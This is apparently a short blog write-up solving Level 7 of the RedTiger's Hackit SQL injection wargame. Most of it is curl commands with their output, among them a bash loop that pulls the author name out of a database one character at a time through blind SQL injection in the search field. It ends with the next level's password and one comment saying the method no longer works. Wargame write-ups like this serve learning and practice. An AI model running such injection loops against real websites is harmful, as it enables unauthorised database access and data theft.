# RedTigers Hackit wargame: Level 7


# curl --silent --insecure --cookie-jar level7 --cookie level7 --request POST --data "password=646f6e745f73686f75745f61745f796f75725f6469736b73&level7login=Login" https://redtiger.dyndns.org/hackit/level7.php
                <b>Welcome to Level 7</b><br><br>
                Target: Get the name of the user who posted the news about google. Table: level7_news column: autor<br>
                Restrictions: no comments, no substr, no substring, no ascii, no mid, no like<br>
                <br><br><br> <form method="post"> <input type="text" name="search" value=""> <input type="submit" value="search!" name="dosearch"> </form> <br><br><br>
                                <br>
                        <form method="post">
                                Username: <input type="text" name="username"><br>
                                <input type="submit" name="try" value="Check!">
                        </form>
                        <br>
# for i in `seq 1 17`; do for j in `echo {A..Z} {a..z} {0..9}`; do d=`printf "%d\n" \'$j`; search="Google%' and ord(left(right(news.autor,$[18-$i]),1))=$d and '%'='"; result=`curl --silent --insecure --cookie level7 --request POST --data "search=$search&dosearch=search\!" https://redtiger.dyndns.org/hackit/level7.php | grep -v "<input" | grep Google`; if [ "$result" != "" ]; then echo -n "$j"; break; fi; done; done; echo
5465737455736572666f72673030676c65
# curl --silent --insecure --cookie level7 --request POST --data "username=5465737455736572666f72673030676c65&try=Check\!" https://redtiger.dyndns.org/hackit/level7.php | grep is:
<br>The password for the next level is: <b>4d4f4f636f774d454f57636174</b> <br><br>

1 comment:

Anonymous said...

It doesn't work anymore